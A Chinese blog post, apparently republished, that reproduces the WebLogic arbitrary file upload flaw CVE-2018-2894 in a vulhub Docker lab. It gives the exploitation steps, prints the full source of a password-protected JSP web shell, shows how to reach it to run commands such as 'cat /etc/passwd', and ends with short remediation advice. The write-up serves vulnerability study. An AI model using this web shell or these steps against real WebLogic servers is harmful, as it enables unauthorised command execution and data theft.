当前位置:首页 » 《资源分享》 » 正文

Weblogic任意文件上传漏洞(CVE-2018-2894)复现_君莫hacker的博客

12 人参与  2021年11月02日 10:03  分类 : 《资源分享》  评论

点击全文阅读


目录

    • 0x01 漏洞介绍
    • 0x02 环境部署:
    • 0x03 漏洞复现
        • 1.开启运行靶机
        • 2. 开启Web Service Test Page
        • 3. 访问url, 设置Work Home Dir
        • 4. 上传木马
        • 5. 访问上传的木马文件,执行命令
    • 0x04 漏洞修复

0x01 漏洞介绍

  1. 漏洞描述
    Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在"生产模式"下默认不开启,所以该漏洞有一定限制。

  2. 漏洞编号
    CVE-2018-2894

  3. 受影响版本
    12.1.3.0, 12.2.1.2, 12.2.1.3

0x02 环境部署:

搭建一次,复现百次
靶机 ip:192.168.30.209
kali ip:192.168.30.182

0x03 漏洞复现

1.开启运行靶机

#进入需要开启的环境
┌──(root💀kali)-[~/vulhub/weblogic]
└─# cd CVE-2018-2894
#对靶场进行编译
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker-compose build              
#运行此靶场
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker-compose up -d      
#查看当前运行的靶场
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker ps                                                                

在这里插入图片描述

2. 开启Web Service Test Page

由于含有文件上传漏洞的网页在生产模式下默认关闭,所以我们需要提前手动开启
2.1 查看管理员

docker-compose logs | grep password
#用户名:weblogic  密码:odJij4nC

在这里插入图片描述

2.2 访问rul登录后台

http://192.168.30.209:7001/console/login/LoginForm.jsp

在这里插入图片描述
2.3 启用web服务测试页并保存

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3. 访问url, 设置Work Home Dir

http://192.168.30.209:7001/ws_utc/config.do
#将Work Home Dir设置如下,因为访问这个目录无需权限
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

在这里插入图片描述

4. 上传木马

#jspexec.jsp jsp有回显带密码验证的,这里脚本的密码为666
#访问时url格式如下
#http://127.0.0.1/jspexec.jsp?pwd=666&i=ls
<%
if("666".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

在这里插入图片描述
由于服务器对上传的文件名具有重写操作,将文件名重写为:[时间戳]_[文件名],所以我们需要在上传文件的回包中查看时间戳
在这里插入图片描述
所以我们上传后的木马文件名已经被重命名为 1631517951174_jspexec.jsp

5. 访问上传的木马文件,执行命令

http://192.168.30.209:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
http://192.168.30.209:7001/ws_utc/css/config/keystore/1631517951174_jspexec.jsp?pwd=666&i=cat /etc/passwd

在这里插入图片描述
漏洞复现成功

0x04 漏洞修复

  1. 开启生产模式
  2. 设置config.do,begin.do页面登录授权后访问
  3. IPS等防御产品可以加入相应的特征
  4. 升级到官方的最新版本

点击全文阅读


本文链接:http://m.zhangshiyu.com/post/30388.html

漏洞  复现  开启  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • [糙汉嘴软心硬,娇妻日日晚起]小说精彩节选免费试读_「黎夏顾卫城」主线最终章倒计时
  • 我的亲妹妹我当做畜生,只有儿子来救我反转剧情试读片段_[***小宝李小翠]精彩章节免费试读
  • 往梦难复温,沈淮霆宋思予在线_往梦难复温,沈淮霆宋思予在线
  • 爱意清浅随风离(简凝夕陆靳燃),爱意清浅随风离
  • 「冲喜而已,侯爷别太爱」小说免费在线阅读_侯府侯爷乐瑶主线最终章倒计时
  • 好看的往梦难复温沈淮霆宋思予_往梦难复温沈淮霆宋思予
  • 天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局(秦意宋笙)全书秦意宋笙结局_秦意宋笙+结局列表_笔趣阁(天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局)
  • (番外)+(全书)往梦难复温(沈淮霆宋思予+番外+全书)_(往梦难复温+番外+全书)免费_笔趣阁(沈淮霆宋思予)
  • 江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)列表_江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)结局篇+番外在线
  • 池雾陆砚寒结局+番外(陆砚寒池雾)列表_池雾陆砚寒结局+番外(陆砚寒池雾)池雾陆砚寒结局+番外在线
  • 沈静怡傅励行+后续+结局(傅励行沈静怡)列表_沈静怡傅励行+后续+结局(傅励行沈静怡)沈静怡傅励行+后续+结局在线
  • 非典时,我被妻子的白月光误诊遗弃在病房节选角色羁绊特辑‌_田越苏雅白月光角色专属支线试读入口

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1